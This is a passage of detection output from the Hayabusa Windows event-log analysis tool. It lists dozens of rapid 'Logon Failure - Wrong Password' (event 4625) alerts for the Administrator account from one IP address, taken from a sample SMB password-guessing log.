NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Djaxf99PVs2VkMy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbTSoTdaQ0Y4c9Gw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g9aTo4QBHfrgPYZ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dpHKjYzZTn0ruIrf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HqhPnV6tc8airRqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RIOCqtXh5ji12U5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwuGZ0kgg1yToLlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZSBbd4qBRuzeKBjD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zS1Muxc9gpcqv23 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c6wiIkfkgtso42P1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1ilRmhSB5RfvpVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PuQ47GGBraimypWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UfUsAYWilbwMScpE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22ZSltGNwIl0DNDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IYwG9IUpdk5DmM8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a8kbGxQFHDBodGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KoLqIaO8p3k9kOkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUnonSx3ZBdkyGhu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1QJziwKhsaJljGV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZhcNRrpODYB9jZxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yi5JE53caVn7n54w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jx6qTASzFp830ud6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4L8HtBWlmAMTjCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4hVfTwibHreepku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3TlapK211UT8SO0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mzzw3uPkn2cgtmlF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aPnfUjwJei5E5BD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mm1k0eeKAYokIbDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w8TDNcJ3LMyNtUe1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogKKslkdXvc9f130 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgoy6gMfe5N0UiP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfjf3d6I8TsBOzvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vs8DG8s81oOwYoI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LFkgN1aDoYkQ4qrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KMwLokYpcFIYHegd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oKradBV4ERsQnKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qPzlzfmgrbYTKqQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKYlBm2lhobHzbjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBMu96oqO9tb3f4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO04Q3eYdzyuy51v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FrIa2UrSrfdhkDCx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axhhyMrGl95O16Vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atjvfi8QeEDluhL2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HPBZKUiiKeyQwSr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2SmitfyjO4mxqw5E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nrq1g8ktTQbPTXqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 943GV3t1muba5IQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPVd28zf85AxdGqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D6evoSSxcKkHspuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C4fznmrnIdUH7DzG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwrrYjUV41P0K5Jh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4RBZrALEnH5BKP9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LU6uWH4gs4iHP7rV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCfhZDAH8ufk77zN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TE9pw4UeRldGeKVc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8PKE05MqxE5TwXT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GIE5fmddOPBbCM3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pveyo4Czx6KWKCGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPyyHaRnBec7Qg2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3b8mudJp5mdkiEW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Y6mjLaCzR28Q2qK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dMsNKWEjeCYYQVqw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7c5fENhkwO6QfEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cr1wAeMhPgVpwV82 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErpp9Ww6LO37C9k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYsNpBsGT5zOKe3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgzUk1Dmttm4AQ3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hp0c3YYyOSJuBHCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gkis4H1MIQPHUwqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lb6mH03qKLb8O7Dz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J10xEmhRNWfJ5FCI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Dujj8A7wwzAwzCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVDE3fIoUQfLn3cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UlD48O0XpFUnuSmo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KyTPKuspADmLpv0L | IP Addr: 192.168.198.149 | AuthPackage: 